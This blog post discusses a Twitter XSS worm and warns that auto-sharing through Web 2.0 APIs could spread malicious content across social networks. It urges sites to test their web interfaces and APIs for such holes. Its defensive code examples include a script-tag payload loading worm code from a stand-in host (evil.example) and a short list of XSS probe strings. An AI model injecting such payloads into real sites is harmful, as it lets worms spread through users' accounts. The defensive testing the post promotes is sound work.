Collaborating automatically via Web 2.0 APIs is a beautiful thing. I can update status on Twitter and it will automagically propagate to any number of social networking sites: Facebook. FriendFeed. MySpace. LinkedIn. If I had to do it all manually, I wouldn’t. But the automation of sharing, i.e. collaboration, between Web 2.0 social networking sites made possible by open APIs is just too easy to pass up.

The danger is, of course, that a single malicious message can just as quickly propagate through that same social network. The power of the API can quickly be turned against us.


I had been considering this very possibility, discussing it with Don, and this morning discovered that someone has already begun to figure out how to twist APIs to do their malicious bidding. Over the weekend, an XSS-based worm began making its way through Twitter.

Earlier today we were informed of a malicious site that was spreading links on Twitter without user consent via a cross-site scripting vulnerability. We’ve taken steps to remove the offending updates, and to close the holes that allowed this “worm” to spread.

No passwords, phone numbers, or other sensitive information were compromised as part of this attack. [emphasis added]

Twitter’s blog states that the worm is “similar to the famous Samy worm which spread across the popular MySpace social-networking site a while back.” This particular worm appears to be confined to Twitter. For the nonce, that is. The worm was spread via accounts created specifically to do just that, so the damage should (hopefully) be somewhat contained. Twitter notes that “about 90 accounts were compromised,” a tiny fraction of the millions of accounts it could possibly have compromised.

Yet another good reason not to auto-follow new accounts, isn’t it?

What should be frightening to Twitter – and you – and what alarms me is that exploiting the collaborative nature of social networking and Web 2.0 sites seems an obvious path to profit for miscreants. You are only as secure as the weakest link in the chain, and that has never been more true than it is in the Web 2.0 world. If Twitter is insecure – and it obviously was – and I can insert malicious code into my updates, and those updates are automatically shared with other sites – Facebook, FriendFeed, MySpace, etc. – then it is possible that that malicious code will be shared with all of those sites as well.

Worse, it is shared not only with my accounts, but with everyone subscribed to my profiles and updates, and with all the sites they share that information with, automatically. It is an exponential growth pattern, sharing cascading from one connection to the next, until a single malicious message has made its way through millions of users. Automatically. And these shares are automatic, leveraging the power of APIs and the nature of human beings: we’re lazy. That’s not a bad thing; I’m as lazy as the next person when it comes to sharing information, and if there’s a way to automate the process (and there is), I will. But that same automation is as dangerous as the secret tunnels under an ancient castle connecting to other buildings, rooms, and the world outside the walls. They can be used both by those intent on good – and bad.
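The arithmetic behind that exponential growth pattern is easy to sketch. This is a toy back-of-the-envelope model, not real network data; the follower count and hop count are purely illustrative assumptions.

```python
# Toy model of how auto-sharing fans a single malicious update out
# across connected accounts. Numbers are illustrative assumptions.

def spread(followers_per_account: int, hops: int) -> int:
    """Accounts reached if every exposed account auto-shares the
    message to all of its followers, hop after hop."""
    reached = 0
    frontier = 1  # the one account that posted the malicious update
    for _ in range(hops):
        frontier *= followers_per_account
        reached += frontier
    return reached

# A modest 100 followers each, and only 3 hops of automatic re-sharing:
print(spread(100, 3))  # → 1010100 accounts
```

Three automatic hops at a modest fan-out already puts the message in front of over a million accounts, which is the whole point: no human has to lift a finger past the first post.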

It appears to be, from here, an attack surface of exponentially growing potential. It could be the single largest existing botnet in history. And if that doesn’t scare you, I don’t know what will.


It behooves Twitter, and other well-known (and not so well-known) social networking sites, to test, test, and test again not only their web interfaces, but their APIs. Twitter is not saying how the worm was spreading (via the API, the web, or both), but given the ease with which third-party providers automate finding and following new folks, and the extensive use of other third-party Web 2.0 sites to auto-follow those who follow you…I’m guessing the API was an integral part of this attack. And if it wasn’t, it will be the next time – or the time after that.

This worm was “malicious,” but in the same way the (very old now) Cookie virus was malicious: it didn’t destroy anything or share any personal information.

Currently, there aren’t any signs that this worm will do any damage other than posting nuisance messages on your Twitter account. Nevertheless, you should remove it as soon as you suspect you’ve caught the worm.

And maybe that’s a good thing, because holes have now been closed that could have allowed content of a far more nefarious nature to propagate automatically through Twitter – and beyond. Just because this worm didn’t fully exploit the connected nature of Web 2.0 and social networking doesn’t mean the next one won’t.

And when someone finally decides to exploit – automatically – the connectedness of Web 2.0 and the tendency of sites not to test and retest their APIs and sites for possible vulnerabilities, it’s going to be a spectacular display of ugliness. And outrage.


The potential good that comes from collaboration generally outweighs the potential risks – and the costs to mitigate them. This is the same argument used to dismiss or at least downplay the dangers of a shared environment within cloud computing.

But when you share resources or data – especially data – you share all the risks that go along with them. And even if you’ve taken the appropriate steps to secure your own site or API, that does not mean everyone connected to you via a shared connection has done the same. Assuming that data transferred to and from your site by third parties via APIs can be trusted is a bad assumption.
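One concrete way to act on that assumption is to escape anything fetched from a third-party API before it reaches a page or gets re-posted. A minimal sketch, using Python's standard-library `html.escape`; the `render_status` function and its markup are hypothetical stand-ins for whatever your application actually renders.

```python
import html

def render_status(update_text: str) -> str:
    """Treat text fetched from a third-party API as untrusted:
    HTML-escape it before it ever reaches a browser."""
    return '<p class="status">%s</p>' % html.escape(update_text)

# A worm-style payload arrives via a cross-posted update...
payload = '<script src="http://evil.example/worm.js"></script>'

# ...and comes out as inert text, not an executing script tag.
print(render_status(payload))
```

Escaping at the output boundary, rather than trusting the sender to have sanitized, is exactly the discipline that breaks the propagation chain described above.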


If you haven’t thoroughly tested the security posture of your web application or APIs – you need to do it now. If that means a thorough code review from a security perspective – that’s what it means. If you aren’t certain your developers will find all the possible holes (there are tons of them, after all), then get thyself to OWASP or a service like White Hat Sentinel, and find them. If you prefer a web application firewall, get one and deploy it. Consider virtual patching as a stopgap measure to ensure a positive security posture now, while you seek out and destroy any possible holes in your applications.
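The cheapest form of that testing is a probe harness: feed classic XSS payloads through whatever code produces user-visible output and fail loudly if raw markup survives. Everything below is a hypothetical sketch – the probe list is a tiny sample, and `render` is a stand-in you would replace with your application's real rendering or API-serialization path.

```python
import html

# A tiny sample of classic XSS probe strings (a real suite would be larger).
XSS_PROBES = [
    '<script>alert(1)</script>',
    '"><img src=x onerror=alert(1)>',
    '<svg/onload=alert(1)>',
]

def render(update_text: str) -> str:
    # Stand-in for the application's real output path; point the
    # harness at your actual template or API-response code instead.
    return html.escape(update_text)

def audit(render_fn) -> list:
    """Return the probes that come back with live markup intact."""
    return [p for p in XSS_PROBES
            if "<" in render_fn(p) or ">" in render_fn(p)]

print(audit(render))  # → [] : every probe was neutralized
```

Run the same audit against every output path – web templates and API responses alike – since, as this worm demonstrated, an update escapes through whichever door you forgot to check.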

No Web 2.0 application is an island, at least not one worth using today. It’s connected, it’s collaborating, and it’s doing so automatically – via APIs. If you aren’t testing those APIs as thoroughly as you are the web interface, you are full of FAIL.
